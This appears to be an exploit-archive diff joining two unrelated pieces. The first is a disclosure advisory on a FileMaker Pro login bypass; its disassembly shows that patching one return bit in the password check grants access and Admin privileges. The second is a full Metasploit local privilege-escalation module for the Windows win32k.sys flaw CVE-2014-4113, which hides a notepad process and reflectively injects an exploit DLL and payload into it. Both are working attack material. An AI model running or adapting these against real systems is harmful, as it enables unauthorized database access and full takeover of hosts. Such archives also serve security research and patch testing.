[VULNERABILITY INFORMATION]
Class: Authentication Bypass and Privilege Escalation
Category: Desktop Application
Severity: High
CVSS v2 Vector: 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C
[AFFECTED PRODUCTS]
This security vulnerability affects:
* FileMaker Pro 13.0v3 - FileMaker Pro Advanced 12.0v4
[VULNERABILITY DETAILS]
There is a obvious vulnerability of FileMaker that allow access to the local FM-based database file:
On DBEngine dll, there is a function called MatchPasswordData:
...
...
...
5BB8D53A C68424 74020000 >MOV BYTE PTR SS:[ESP+274],0
5BB8D542 FF15 D437D25B CALL DWORD PTR DS:[<&Support.??1PasswordHash@Draco@@QAE@XZ>] <-- Compute the password's hash.
5BB8D548 8B8C24 6C020000 MOV ECX,DWORD PTR SS:[ESP+26C]
5BB8D54F 5F POP EDI
5BB8D550 5E POP ESI
5BB8D551 8AC3 MOV AL,BL <-- if AL is 0 then you are not authenticated else if AL is 1 you are authenticated,
so simply by changing a single bit you are able to bypass the login,
also if your username is Admin, you can obtain a privilege escalation and full permissions on DB.
5BB8D553 64:890D 00000000 MOV DWORD PTR FS:[0],ECX
5BB8D55A 5B POP EBX
5BB8D55B 8BE5 MOV ESP,EBP
5BB8D55D 5D POP EBP
5BB8D55E C2 0400 RETN 4
...
...
...
it doesn't matter if your desktop or mobile application is developed in a "secure manner", your confidential data on the database can be accessed.
[DISCLOSURE TIME-LINE]
* 19/10/2014 - Public disclosure and simultaneously initial vendor contact.
[DISCLAIMER]
The author is not responsible for the misuse of the information provided in
this security advisory. The advisory is a service to the professional security
community. There are NO WARRANTIES with regard to this information. Any
application or distribution of this information constitutes acceptance AS IS,
at the user's own risk. This information is subject to change without notice.

158
platforms/windows/local/35101.rb Executable file

@ -0,0 +1,158 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'
class Metasploit3 < Msf::Exploit::Local
Rank = NormalRanking
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::FileInfo
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info={})
super(update_info(info, {
'Name' => 'Windows TrackPopupMenu Win32k NULL Pointer Dereference',
'Description' => %q{
This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability
can be triggered through the use of TrackPopupMenu. Under special conditions, the
NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary
code execution. This module has been tested successfully on Windows XP SP3, Windows
2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows
2008 R2 SP1 64 bits.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # vulnerability discovery and exploit in the wild
'juan vazquez', # msf module (x86 target)
'Spencer McIntyre' # msf module (x64 target)
],
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Targets' =>
[
# Tested on (32 bits):
# * Windows XP SP3
# * Windows 2003 SP2
# * Windows 7 SP1
# * Windows 2008
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
# Tested on (64 bits):
# * Windows 7 SP1
# * Windows 2008 R2 SP1
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
],
'Payload' =>
{
'Space' => 4096,
'DisableNops' => true
},
'References' =>
[
['CVE', '2014-4113'],
['OSVDB', '113167'],
['BID', '70364'],
['MSB', 'MS14-058'],
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/']
],
'DisclosureDate' => 'Oct 14 2014',
'DefaultTarget' => 0
}))
end
def check
os = sysinfo["OS"]
if os !~ /windows/i
return Exploit::CheckCode::Unknown
end
if sysinfo["Architecture"] =~ /(wow|x)64/i
arch = ARCH_X86_64
elsif sysinfo["Architecture"] =~ /x86/i
arch = ARCH_X86
end
file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
major, minor, build, revision, branch = file_version(file_path)
vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
# Neither target suports Windows 8 or 8.1
return Exploit::CheckCode::Safe if build == 9200
return Exploit::CheckCode::Safe if build == 9600
if arch == ARCH_X86
return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build)
else
return Exploit::CheckCode::Detected if build == 7601
end
return Exploit::CheckCode::Unknown
end
def exploit
if is_system?
fail_with(Exploit::Failure::None, 'Session is already elevated')
end
if check == Exploit::CheckCode::Safe
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
end
if sysinfo["Architecture"] =~ /wow64/i
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
elsif sysinfo["Architecture"] =~ /x64/ && target.arch.first == ARCH_X86
fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
elsif sysinfo["Architecture"] =~ /x86/ && target.arch.first == ARCH_X86_64
fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
end
print_status('Launching notepad to host the exploit...')
notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
begin
process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.")
rescue Rex::Post::Meterpreter::RequestError
# Reader Sandbox won't allow to create a new process:
# stdapi_sys_process_execute: Operation failed: Access is denied.
print_status('Operation failed. Trying to elevate the current process...')
process = client.sys.process.open
end
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
if target.arch.first == ARCH_X86
dll_file_name = 'cve-2014-4113.x86.dll'
else
dll_file_name = 'cve-2014-4113.x64.dll'
end
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4113', dll_file_name)
library_path = ::File.expand_path(library_path)
print_status("Injecting exploit into #{process.pid}...")
exploit_mem, offset = inject_dll_into_process(process, library_path)
print_status("Exploit injected. Injecting payload into #{process.pid}...")
payload_mem = inject_into_process(process, payload.encoded)
# invoke the exploit, passing in the address of the payload that
# we want invoked on successful exploitation.
print_status('Payload injected. Executing exploit...')
process.thread.create(exploit_mem + offset, payload_mem)
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
end
end